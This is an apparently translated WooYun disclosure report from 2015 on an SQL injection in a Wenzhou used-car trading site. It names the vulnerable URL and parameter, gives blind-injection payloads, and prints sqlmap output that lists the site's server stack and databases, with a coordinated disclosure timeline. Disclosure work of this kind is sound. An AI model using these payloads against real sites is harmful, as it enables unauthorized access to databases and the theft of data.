
Vulnerability summary

Defect ID: wooyun-2015-0126231

Title: SQL injection vulnerability on the main site of Wenzhou Used Car Trading Network (温州二手车交易网)

Vendor: 温州二手车交易网

Author: Dormant

Submitted: 2015-07-15 12:31

Fixed: 2015-08-31 16:10

Published: 2015-08-31 16:10

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 5

Status: handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: details sent to the vendor, awaiting vendor handling
2015-07-17: vendor confirmed; details disclosed to the vendor only
2015-07-27: details disclosed to core white hats and relevant domain experts
2015-08-06: details disclosed to regular white hats
2015-08-16: details disclosed to intern white hats
2015-08-31: details disclosed to the public

Brief description:

SQL injection vulnerability on the main site of Wenzhou Used Car Trading Network (温州二手车交易网)

Detailed description:

Injection point: http://www.wz2sc.com/coms.php?com_title=
Just throw it into sqlmap and run it!
Place: GET
Parameter: com_title
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: com_title=%' AND 3806=3806 AND '%'='
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: com_title=%' AND SLEEP(5) AND '%'='
---
[00:02:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.8
back-end DBMS: MySQL 5.0.11
[00:02:09] [INFO] fetching database names
[00:02:09] [INFO] fetching number of databases
[00:02:09] [INFO] resumed: 10
[00:02:09] [INFO] resumed: information_schema
[00:02:09] [INFO] resumed: ctb
[00:02:09] [INFO] resumed: i2sc
[00:02:09] [INFO] resumed: jiazhao
[00:02:09] [INFO] resumed: lqsc
[00:02:09] [INFO] resumed: mysql
[00:02:09] [INFO] resumed: paibiqu
[00:02:09] [INFO] resumed: paichequ
[00:02:09] [INFO] resumed: performance_schema
[00:02:09] [INFO] resumed: wz2sc
available databases [10]:
[*] ctb
[*] i2sc
[*] information_schema
[*] jiazhao
[*] lqsc
[*] mysql
[*] paibiqu
[*] paichequ
[*] performance_schema
[*] wz2sc
current database: 'wz2sc'
Guessing tables:
Too many; I won't dump any further.

Proof of vulnerability:

Same sqlmap output as in the detailed description above.

Fix recommendation:

Filtering.

Copyright notice: when reposting, please credit the source: Dormant@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-07-17 16:08

Vendor reply:

Latest status:

None yet